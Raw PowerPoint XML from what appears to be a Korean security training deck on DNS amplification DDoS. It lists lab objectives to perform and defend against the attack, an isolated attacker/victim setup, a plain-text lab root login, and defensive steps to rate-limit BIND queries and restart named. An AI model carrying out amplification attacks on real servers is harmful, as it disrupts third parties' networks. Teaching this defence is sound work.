                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E6A2DB-FD5C-4AA2-A494-F01D7EEA67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628" y="989088"/>
            <a:ext cx="3985260" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11296526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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 14. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– DNS Amplification</a:t>
            </a:r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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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현재 일부 사용자들이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DNS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증폭 공격을 받는 중으로 보고되었다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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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Bind DNS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서버 설정을 통해 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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하나의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IP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에서 분당 요청할 수 있는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DNS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쿼리의 수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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제한하시오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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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   &lt;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실습서버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  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계정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: root / toor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="7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chemeClr val="bg2">
                    <a:lumMod val="9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- DNS Amplification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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공격을 수행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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- DNS Amplification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공격을 방어할 수 있다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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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sv-SE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DNS Attacker(Kali Linux / 10.10.1.166)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" sz="10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lang="sv-SE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DNS Victim(CentOS 6.4 / 10.10.1.101) + DDWRT(10.10.1.1)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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2" name="Picture 2" descr="보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B0801D1-9391-4CD4-B7B8-6A264D1A2A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74" t="12467" r="11967" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="662681" y="3412409"/>
            <a:ext cx="565945" cy="562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241564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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 1) wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 패킷 확인</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249B49EA-BD74-477E-BE2D-B290D96B46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498" y="711502"/>
            <a:ext cx="5400040" cy="3643884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC1C7637-0B41-4FAA-A8F7-F2A144ECFC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1462" y="711502"/>
            <a:ext cx="5400040" cy="3774059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53451184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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>named.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 수정 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>named.conf</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4) named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
